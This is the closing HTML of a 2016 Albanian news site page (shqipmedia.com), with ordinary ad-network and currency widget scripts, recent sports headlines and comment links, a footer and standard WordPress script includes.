   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='http://aplikacii.com/reklami/www/delivery/ck.php?n=a3ccd010&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://aplikacii.com/reklami/www/delivery/avw.php?zoneid=2411&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a3ccd010' border='0' alt='' /></a></noscript>
</div>
		</aside><aside id="text-48" class="widget widget_text">			<div class="textwidget"><div align="center" style="margin-top: 30px;"><div align="center" style="margin: 0px; padding: 0px; border: 2px solid rgb(136, 136, 136); width: 100%; background-color: rgb(229, 232, 242);"><div align="center" style="width: 100%; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(136, 136, 136); margin: 0px; padding: 0px; text-align: center; color: rgb(0, 0, 0); background-color: rgb(212, 219, 247);"><a href="http://fx-rate.net/EUR/" style="text-decoration: none; font-size: 14px; font-weight: bold; text-align: center; color: rgb(0, 0, 0);"><img src="http://fx-rate.net/images/countries/eu.png" style="margin: 0px; padding: 0px; border: none;"> Shkëmbimi valutor</a></div><script type="text/javascript" src="http://fx-rate.net/fx-rates2.php?label_name=Shkëmbimi valutor&lab=1&width=100%&currency=EUR&cp1_Hex=000000&cp2_Hex=e5e8f2&cp3_Hex=d4dbf7&hbg=0&flag_code=eu&length=short&label_type=country_name&cp=000000,e5e8f2,d4dbf7&cid=MKD,ALL,TRY,BGN&lang=en"></script></div></div></div>
		</aside><aside id="text-31" class="widget widget_text">			<div class="textwidget"><br />
<script id ="apid_lokea4w268v8l926s0sere" type="text/javascript">
  var script= document.createElement("script");
  script.setAttribute("src", "http://mas.nth.ch/mas/mas.jsp?apid=lokea4w268v8l926s0sere");
  script.type = "text/javascript";
  var head = document.getElementsByTagName("head")[0];
  head.appendChild(script);
</script>

<script id ="apid_oio9z3qu9umjof0lbpo1w4" type="text/javascript">
  var script= document.createElement("script");
  script.setAttribute("src", "http://mas.nth.ch/mas/mas.jsp?apid=oio9z3qu9umjof0lbpo1w4");
  script.type = "text/javascript";
  var head = document.getElementsByTagName("head")[0];
  head.appendChild(script);
</script></div>
		</aside><aside id="text-2" class="widget widget_text"><h3 class="sb-title">Bashkohu në Facebook</h3>			<div class="textwidget"><iframe src="//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2FShqipmedia&amp;width=400&amp;height=258&amp;colorscheme=light&amp;show_faces=true&amp;header=false&amp;stream=false&amp;show_border=true&amp;appId=369748999717737" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100%; height:220px;" allowTransparency="true"></iframe>

</div>
		</aside></div><!-- #sidebar -->		</div><!-- .row -->
    </div><!-- #main .wrap -->
</div><!-- #main -->
        <div id="secondary" role="complementary">
            <div class="wrap clear">
                <div class="column one-fourth">
							<aside id="recent-posts-5" class="widget widget_recent_entries">		<h3 class="sc-title">Të fundit</h3>		<ul>
					<li>
				<a href="http://www.shqipmedia.com/thyhet-rekordi-i-futbollit-italian-debuton-sulmuesi-15-vjecar-i-lindur-me-2001/">Thyhet rekordi i futbollit italian, debuton sulmuesi 15 vjeçar i lindur më 2001</a>
							<span class="post-date">12/23/2016</span>
						</li>
					<li>
				<a href="http://www.shqipmedia.com/granit-xhaka-nuk-e-ka-ndermend-te-ndryshoje-stilin-e-lojes-pavaresisht-kartoneve-te-kuq/">Granit Xhaka nuk e ka ndërmend të ndryshojë stilin e lojës pavarësisht kartonëve të kuq</a>
							<span class="post-date">12/23/2016</span>
						</li>
					<li>
				<a href="http://www.shqipmedia.com/januzaj-mund-te-jete-vendimtar-per-sunderlandin/">Januzaj mund të jetë vendimtar për Sunderlandin</a>
							<span class="post-date">12/23/2016</span>
						</li>
					<li>
				<a href="http://www.shqipmedia.com/superkupa-juventus-milan-allegri-surprize-ne-formacion/">Superkupa/ Juventus-Milan. Allegri surprizë në formacion</a>
							<span class="post-date">12/23/2016</span>
						</li>
					<li>
				<a href="http://www.shqipmedia.com/gjyqtarja-e-famshme-ia-preken-gjinjte-guardiola-i-bertiti-tash-asistoi-ne-gol/">Gjyqtarja e famshme: Ia prekën gjinjtë, Guardiola i bërtiti, tash asistoi në gol!!!</a>
							<span class="post-date">12/23/2016</span>
						</li>
				</ul>
		</aside>		                </div><!-- .column one-fourth -->
                <div class="column one-fourth">
					                </div><!-- .column one-fourth -->
                <div class="column one-fourth">
					<aside id="recent-comments-2" class="widget widget_recent_comments"><h3 class="sc-title">Recent Comments</h3><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Sali Ramadani</span> on <a href="http://www.shqipmedia.com/top-lajm-biseda-e-beg-rizajt-e-mirsad-ndrecajt-me-spiunin-maqedonas-audio/#comment-6349">TOP LAJM: Biseda e Beg Rizajt e Mirsad Ndrecajt me spiunin maqedonas &#8211; AUDIO</a></li><li class="recentcomments"><span class="comment-author-link">verwest85 .</span> on <a href="http://www.shqipmedia.com/isis-me-plis/#comment-6348">ISIS me plis</a></li><li class="recentcomments"><span class="comment-author-link">Poker</span> on <a href="http://www.shqipmedia.com/lajm-a-e-din-zemri-qamili-se-a-jane-ekzekutuar-beg-rizaj-dhe-mirsad-ndrecaj/#comment-6347">Lajm: A e din Zemri Qamili se a janë ekzekutuar Beg Rizaj dhe Mirsad Ndrecaj?</a></li><li class="recentcomments"><span class="comment-author-link">Sula Sulejmani</span> on <a href="http://www.shqipmedia.com/ky-eshte-shenasi-memeti-agjenti-i-maqedonise-foto/#comment-6346">Ky është Shenasi Memeti, agjenti i Maqedonisë &#8211; FOTO</a></li><li class="recentcomments"><span class="comment-author-link">bujo_boss@msn.com</span> on <a href="http://www.shqipmedia.com/mirsad-ndrecaj-nato-percillet-per-ne-banesen-e-fundit-foto/#comment-6345">Mirsad Ndrecaj &#8211; NATO përcillet për në banesën e fundit &#8211; FOTO</a></li></ul></aside>                </div><!-- .column one-fourth -->
                <div class="column one-fourth last">
					                </div><!-- .column one-fourth .last -->
            </div><!-- #secondary .wrap -->
        </div><!-- #secondary -->
	<footer id="footer" role="contentinfo">
    <div class="wrap clear">
        <div class="notes-left">© 2008-2016 shqipmedia.com - Të gjitha të drejtat e rezervuara.</div><!-- .notes-left -->
        <div class="notes-right"> </div><!-- .notes-right -->
    </div><!-- #footer wrap -->
</footer><!-- #footer -->

<div class="fixed-widget-bar fixed-left">
	</div>

<div class="fixed-widget-bar fixed-right">
	</div>

</div> <!-- #page -->
<div class="scroll-to-top"><a href="#" title="Scroll to top"><span class="sr-only">Top</span></a></div><!-- .scroll-to-top -->
        <div id="fb-root"></div>
        <script>(function(d, s, id) {
          var js, fjs = d.getElementsByTagName(s)[0];
          if (d.getElementById(id)) return;
          js = d.createElement(s); js.id = id;
          js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=102104852359&version=v2.3";
          fjs.parentNode.insertBefore(js, fjs);
        }(document, 'script', 'facebook-jssdk'));</script>	
    	<div style="display:none">
	</div>
<link rel='stylesheet' id='dashicons-css'  href='http://www.shqipmedia.com/wp-includes/css/dashicons.min.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='thickbox-css'  href='http://www.shqipmedia.com/wp-includes/js/thickbox/thickbox.css?ver=4.6.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/custom.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/jquery.easing.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/froogaloop2.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/jquery.flexslider-min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/js/jquery.marquee.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/jetpack/modules/photon/photon.js?ver=20130122'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201651'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/sharify/admin/inc/sharifycounts.js?ver=1.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/themes/newsplus-new/js/jquery.hoverIntent.minified.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/themes/newsplus-new/js/jquery.prettyPhoto.js?ver=4.6.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ss_custom = {"top_bar_sticky":"","main_bar_sticky":"true","expand_menu_text":"Expand or collapse menu items.","enable_responsive_menu":"true"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/themes/newsplus-new/js/custom.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/wp-embed.min.js?ver=4.6.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var thickboxL10n = {"next":"Next >","prev":"< Prev","image":"Image","of":"of","close":"Close","noiframes":"This feature requires inline frames. You have iframes disabled or your browser does not support them.","loadingAnimation":"http:\/\/www.shqipmedia.com\/wp-includes\/js\/thickbox\/loadingAnimation.gif"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script>
<script type='text/javascript' src='http://stats.wp.com/e-201651.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:4.4.1',blog:'13541830',post:'79572',tz:'2',srv:'www.shqipmedia.com'} ]);
	_stq.push([ 'clickTrackerInit', '13541830', '79572' ]);
</script>
</body>
</html>